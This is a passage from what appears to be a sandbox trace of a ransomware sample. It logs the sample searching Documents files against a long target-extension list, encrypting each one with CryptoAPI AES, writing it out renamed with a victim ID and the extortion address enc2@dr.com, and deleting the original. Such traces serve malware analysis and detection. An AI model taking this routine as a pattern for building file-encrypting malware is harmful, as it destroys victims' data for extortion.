d.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pptx") returned=".pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.471] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.471] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.471] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.477] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x18e4f, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x18e4f, lpOverlapped=0x0) returned 1
	[0185.483] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.484] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcac48) returned 1
	[0185.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.486] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.486] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.486] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0185.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.487] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x18e4f, dwBufLen=0x18e4f | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x18e50) returned 1
	[0185.490] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.490] RtlMoveMemory (in: Destination=0xff5fd8, Source=0xfdd180, Length=0x18e4f | out: Destination=0xff5fd8) 
	[0185.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.490] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff5fd8*, pdwDataLen=0x18bc0c*=0x18e4f, dwBufLen=0x18e50 | out: pbData=0xff5fd8*, pdwDataLen=0x18bc0c*=0x18e50) returned 1
	[0185.493] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.493] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0185.493] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.493] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0185.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.494] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0185.494] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.494] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.524] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.525] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 87
	[0185.525] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.527] WriteFile (in: hFile=0x2c0, lpBuffer=0xff5fd8*, nNumberOfBytesToWrite=0x18e50, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff5fd8*, lpNumberOfBytesWritten=0x18c068*=0x18e50, lpOverlapped=0x0) returned 1
	[0185.534] CloseHandle (hObject=0x2c0) returned 1
	[0185.534] CloseHandle (hObject=0x384) returned 1
	[0185.535] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx")) returned 1
	[0185.541] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx")) returned 0
	[0185.542] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ff2800, ftCreationTime.dwHighDateTime=0x1d9730f, ftLastAccessTime.dwLowDateTime=0xf2d383a0, ftLastAccessTime.dwHighDateTime=0x1d975ec, ftLastWriteTime.dwLowDateTime=0xf2d383a0, ftLastWriteTime.dwHighDateTime=0x1d975ec, nFileSizeHigh=0x0, nFileSizeLow=0x1370d, dwReserved0=0x0, dwReserved1=0x0, cFileName="gQPtmecbEbPEZg5.rtf", cAlternateFileName="GQPTME~1.RTF")) returned 1
	[0185.542] lstrcmpW (lpString1="gQPtmecbEbPEZg5.rtf", lpString2="..") returned 1
	[0185.543] lstrcmpW (lpString1="gQPtmecbEbPEZg5.rtf", lpString2=".") returned 1
	[0185.543] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.543] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="gQPtmecbEbPEZg5.rtf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\gQPtmecbEbPEZg5.rtf") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\gQPtmecbEbPEZg5.rtf"
	[0185.543] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\gQPtmecbEbPEZg5.rtf") returned 51
	[0185.543] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.543] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\gQPtmecbEbPEZg5.rtf", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf") returned 0x33
	[0185.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.544] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.544] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf") returned="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf"
	[0185.544] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\gqptmecbebpezg5.rtf") returned 51
	[0185.544] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.545] StrStrW (lpFirst=".rtf", lpSrch=".") returned=".rtf"
	[0185.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.545] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rtf") returned=".rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt